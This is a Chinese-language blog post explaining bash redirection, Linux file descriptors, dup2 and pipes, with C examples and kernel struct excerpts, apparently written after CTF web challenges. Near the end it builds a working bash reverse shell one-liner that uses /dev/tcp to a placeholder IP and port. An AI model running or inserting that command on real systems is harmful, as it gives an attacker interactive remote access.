Redirection in bash

一些廢話寫在前面

最近在解一些 Web 題的時候需要用 bash 在目標主機上開 reverse shell，由於我不是那麼熟悉開 shell 所需的指令（當中用到各種輸出重導向，但是解 pwn 的水題通常只需要 system("sh")），所以常常都是上網抄一抄拿來用，沒想到這次抄過來的居然是壞的，實在是很火大，於是只好把跟 file descriptor 相關的文件翻一翻解掉問題，也順便產篇文章。

由於比較像是隨筆，若是嫌無聊的讀者可以跳著看。

File descriptor

在 Linux kernel 的設計中 “Everything is a file” 是個很重要的概念，也就是無論一支程式今天想要讀取檔案、操作網卡、與連接在序列埠上的裝置互動…等 I/O 操作，都需要透過像是對檔案進行讀寫等操作來完成的，而 file descriptor 就是 Linux 實作這個設計理念時，為了讓使用者更容易操作檔案所誕生的。

查閱 man 2 open，

The return value of open() is a file descriptor, a small, nonnegative integer that is used in subsequent system calls (read(2), write(2), lseek(2), fcntl(2), etc.) to refer to the open file.

可以得知當我們呼叫 open 這個函數（或系統呼叫）時，若是成功，則 kernel 會回傳一個非負的小整數給程式，並且可以用於接下來的 read、write、lseek 等檔案操作函數上。

若是讀者熟悉 C 語言的話，就會知道若是編譯以下程式並在終端機中執行，則會讀取 hello 中的內容並輸出至終端機上。

#include <unistd.h>
#include <fcntl.h>
char buf[0x100];

int main() {
  int fd = open("hello", O_RDONLY)
  
  read(fd, buf, 0x100);
  write(1, buf, 0x100);
  close(fd);
}

程式中的 fd 就是該檔案的 file descriptor，而 1 則是向終端機輸出時需要使用的 file descriptor。
還是回到前面那句話：“Everything is a file”

看到這可能會有人疑惑，不同程式開同一個檔案時拿到的 file descriptor 會相同嗎？

答案是不一定，file descriptor 的作用範圍僅限於該 process，一支 process 開了多少個檔案，他總共有的 file descriptor 數量也就只會有那麼多，同時根據開檔順序不同，檔案對應的 fd 也會不同。

接著來看看實作，可以在 struct task_struct 中找到與 process 讀寫檔案相關的結構 struct files_struct，其中 struct fdtable __rcu *fdt 就是用於紀錄 file descriptor 的變數。

小提醒: struct task_struct 是 linux kernel 中用於記錄一支 process 所有資訊的結構

/*
 * Open file table structure
 */
struct files_struct {
    /*
     * read mostly part
     */
    atomic_t count;
    bool resize_in_progress;
    wait_queue_head_t resize_wait;

    struct fdtable __rcu *fdt; <---
    struct fdtable fdtab;
    /*
     * written part on a separate cache line in SMP
     */
    spinlock_t file_lock ____cacheline_aligned_in_smp;
    unsigned int next_fd;
    unsigned long close_on_exec_init[1];
    unsigned long open_fds_init[1];
    unsigned long full_fds_bits_init[1];
    struct file __rcu * fd_array[NR_OPEN_DEFAULT];
};

struct fdtable 中的元素 fd 會指向一個存放 struct file * 的陣列，而我們從 open 的回傳值拿到的 file descriptor 其實就是陣列中存放該檔案指標的 index

struct fdtable {
    unsigned int max_fds;
    struct file __rcu **fd;      /* current fd array */
    unsigned long *close_on_exec;
    unsigned long *open_fds;
    unsigned long *full_fds_bits;
    struct rcu_head rcu;
};

為了避免混淆，在接下來的文章中我會以
fd 代表 file descriptor 變數
fdlist 代表 fdtable 中用於存放 file descriptor 的陣列

Redirection

瞭解 file descriptor 的運作原理後，就可以搞懂 redirection 是怎麼做的啦

例如說如果想把 "Hello world" 這個字串存進 output_file 中，我們會這樣下指令

bash$ echo "Hello world" > output_file

大致描述整句的語意的話便是，執行 echo "Hello world" 後將輸出導到 output_file 裡
在實作上，bash 會在執行 echo "Hello world" 前將標準輸出(stdout) 替換成 output_file，於是輸出便寫入到 output_file 中了

用 C 語言來表達的話則是

#include <unistd.h>
#include <fcntl.h>

void echo(const char *s) {
  write(1, s, strlen(s));
}

int main() {
  int fd = open("output_file", O_WRONLY);
  dup2(fd, 1);
  echo("Hello world\n");
  
  return 0;
}

其中可以注意到 dup2 這個函數，其實這就是 Redirection 所使用的技巧
擷取 man dup 中的部分

int dup2(int oldfd, int newfd);
The dup2() system call creates a copy of the file descriptor oldfd, using the file descriptor number specified in newfd.

dup2(oldfd, newfd) 會建立一個新的 file descriptor newfd 作為 oldfd 的副本，實際上 linux kernel 做的就是將存在 oldfd 中的指標放到 newfd 裡，進而改變實際寫入(write)的對象。

fdlist[newfd] = fdlist[oldfd]

Redirections in bash

再來提提 bash 中的各種 Redirection

由於每個 shell 的實作與行為不盡相同，在這裡只以 bash 為例

`<`, `>` (Redirecting Input/Output)

用於 I/O 重導向，使用的格式為 [n]<word/[n]>word
在 word 展開為一檔案名稱後將會分別以 O_RDONLY/O_WRONLY 開檔得到 fd 並 dup2(fd, n)，n 為 optional，分別的預設為 0/1

`<&`, `>&` (Duplicating File Descriptors)

用於複製 fd，使用的格式為 [n]<&word/[n]>&word
在 word 展開為非零整數 fd 後將會 dup2(fd, n)，n 為 optional，分別的預設為 0/1

雖然 man bash 中提到，[n]<&word 中的 word 在展開後必須要是一個用於 input 的 fd，而 [n]>&word 中的則是需要用於 output，不過實際測試的時候卻都可以(?)，還蠻奇怪的

`&>` (Output Redirecting)

為一種特殊用法，使用的格式為 &>word，與 >word 2>&1 等價

`<>` (Opening File Descriptor for R/W)

用於為一個檔案開啟可以同時進行讀寫的 fd，格式為 [n]<>word
在 word 展開為一檔案名稱後將會開檔得到 fd 並 dup2(fd, n)，n 為 optional，預設為 0

在使用上也要注意順序，才不會覆蓋掉已經進行 Redirection 的 fd

# copy fd(dirlist) into stdout, copy stdout into stderr
ls > dirlist 2>&1 # (O)

# copy stdout into stderr, copy fd(dirlist) into stdout
ls 2>&1 > dirlist # (X)

Reverse shell in bash

離 bash 的 reverse shell 還差最後一哩路，最後需要瞭解的是在 bash 裡中使用 redirection 時可以利用 /dev/tcp/<IP>/<PORT> 以及 /dev/udp/<IP>/<PORT> 作為 psuedo file，例如:

nc -vlkp 8888 <<< "PING"
cat < /dev/tcp/127.0.0.1/8888 2>&1

所以湊一湊就出來了
（這邊注意到因為 network 相關的操作在 bash 中是利用 socket 開一個 fd，所以是可以同時讀寫的）

bash -c "bash -i < /dev/tcp/<IP>/<PORT> 1<&0 2<&0"

相信在瞭解之後讀者寫 reverse shell 都可以信手捻來XD

Pipe

作為補充也提一下 Pipe。
Pipe 與 Redirection 不同，Redirection 的對象是文件，而 Pipe 的對象則是 process

例如說若是想從檔案中擷取出包含 “hello” 的字串則會這樣寫

cat somefile | grep "hello"

C 語言的可能實作如下

#include <stdio.h>
#include <unistd.h>
#include <stdlib.h>
#include <sys/wait.h>
#define SIZE 0x100

void cat(const char *filename) {
  char command[SIZE];
  snprintf(command, SIZE, "cat %s", filename);
  system(command);
}

void grep(const char *needle) {
  char command[SIZE];
  snprintf(command, SIZE, "grep %s", needle);
  system(command);
}

int main() {
  int pipefd[2];
  pipe(pipefd);

  if (fork()) {
    dup2(pipefd[1], 1);
    cat("somefile");
    close(1);
    wait(NULL);
  }
  else {
    dup2(pipefd[0], 0);
    grep("hello");
  }

  return 0;
}

其做法也同樣是利用替換 fd 的方式來達成，不同的是當中利用了 pipe 系統呼叫來建立一對 fd 讓兩個程式可以溝通。

int pipe(int pipefd[2]);
pipe() creates a pipe, a unidirectional data channel that can be used for interprocess communication. The array pipefd is used to return two file descriptors referring to the ends of the pipe. pipefd[0] refers to the read end of the pipe. pipefd[1] refers to the write end of the pipe. Data written to the write end of the pipe is buffered by the kernel until it is read from the read end of the pipe.

查閱 man pipe 可以瞭解到，pipe 函數會回傳兩個 fd 分別只能用於讀取/寫入。
實際上 linux kernel 是透過 PipeFS 於 kernel 中建立一個虛擬的檔案，並讓使用者可以透過這一對 fd 對該檔案作讀寫來達成跨 process 溝通。

Pipelines in bash

在使用上唯一需要注意的是 pipe (|) 會優先於 redirection (>)，所以若是在 bash 下這樣寫的話 cat 是不會拿到 "Hello" 的喔

echo Hello > somefile | cat